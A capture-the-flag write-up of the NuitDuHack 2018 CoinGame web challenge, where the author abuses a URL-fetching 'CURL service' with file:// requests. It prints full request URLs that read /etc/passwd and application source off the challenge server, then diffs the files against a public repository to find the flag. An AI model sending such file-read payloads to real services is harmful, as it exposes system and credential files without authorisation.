NuitDuHack 2018 CoinGame
NuitDuHack 2018 CoinGame Challenge writeup

I did not get much time to play this CTF but within the time frame, CoinGame was one of the challenges which I was able to solve. This challenge had comparatively lesser solves than other web challenges but was easy.

Challenge link : http://coingame.challs.malice.fr/

Points: 200

So about this challenge, we get a welcome page wherein it is written CURL service

and a textbox wherein we can give url’s (hopefully).

The source code revealed nothing. But after giving google.com in the textbox, we were able to notice a particular request being set and showing us a page with response status 302. The URL was perfect enough to understand what it was, LFI.

The very next step was to see what is inside /etc/passwd. http://coingame.challs.malice.fr/curl.php?way=../../../etc/passwd reveals nothing but, http://coingame.challs.malice.fr/curl.php?way=file:///etc/passwd gave us the list of every registered user that has access to that system.

One particular thing that caught in my mind was tftp. Since the challenge description had mentioned a game, I quickly googled and got the link to the same repo.

Since the file names were there, I quickly tried to see if the files that exist in the challenge server are the same. I then gave in http://coingame.challs.malice.fr/curl.php?way=file:///home/CoinGame/Bonus.py which gave me the Bonus.py file.

I assumed that all the other challenge file names would be the same and we have to only find the files which are altered by the admin of the challenge. I was quickly going through the files in the github repo and found that there were a lot of files and manually fetching would be cumbersome.

So with the help of my team mate, dnvira, we got a script which would actually wget the entire files and subdirectories.

Comparing the hashes of the cloned repo and the one we got from the challenge server gave us a few files being differentiated. I was going through a few of them and apparently a few images in gameAnimationImages had flag written at the bottom end.

flag{_Rends_l'_......

There were two places wherein I was stuck. One was using tftp which would have been a way to proceed further and the next one, fetching all the files. Apparently the former one was where I was stuck for long time.

Reach me out on Twitter.

*****
Written by Gokul Krishna on 02 April 2018